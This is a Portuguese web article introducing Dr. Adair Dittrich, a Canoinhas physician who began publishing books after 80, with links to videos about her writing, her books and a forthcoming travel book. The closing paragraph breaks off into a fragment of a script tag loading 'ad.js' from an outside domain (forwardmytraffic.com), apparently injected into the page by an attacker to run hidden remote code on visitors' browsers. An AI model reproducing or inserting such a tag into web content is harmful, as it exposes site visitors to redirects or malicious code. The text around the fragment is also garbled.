Curiosidades do Passado Principais

Uma conversa com a escritora Dra. Adair Dittrich

Dra. Adair Dittrich, nascida em 14/02/1934, filha de Adolfho Dittrich e Petronilla Rosina Castanha Dittrich (mais conhecida como Dona Nena), médica conhecida na região de Canoinhas, após os 80 anos de idade lança seu primeiro livro: “O meu lugar”. Escrever exige habilidades. Cada escritor, além de inspiração, tem uma forma peculiar de fazer seus registros. Dra. Adair conta como escreve seus livros.

Vídeo: Arte de escrever

A arte de escrever é construída ao longo da vida do escritor. Ele vai adquirindo estilo próprio. Dra. Adair fala sobre seus escritores preferidos e estilo literário.

Vídeo: Estilo literário

Ao falar sobre seu segundo livro, “Rum na lama vermelha”, Dra. Adair registra o papel da Academia de Letras do Brasil- Canoinhas como incentivo para edição de suas obras.

Vídeo: “Rum na lama vermelha”

Para aqueles que já apreciaram seus livros, saibam que o terceiro está prestes a ser lançado com o tema “Andanças pela Europa”. A escritora relata sobre sua obra:

Vídeo: Novo livro a ser lançado

 

Além da arte de escrever, Dra. Adair Ditrich nos presenteia com seu exemplo de vida. Ela é inspiração para aqueles que sonham em escrever um livro…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Comente esta matéria: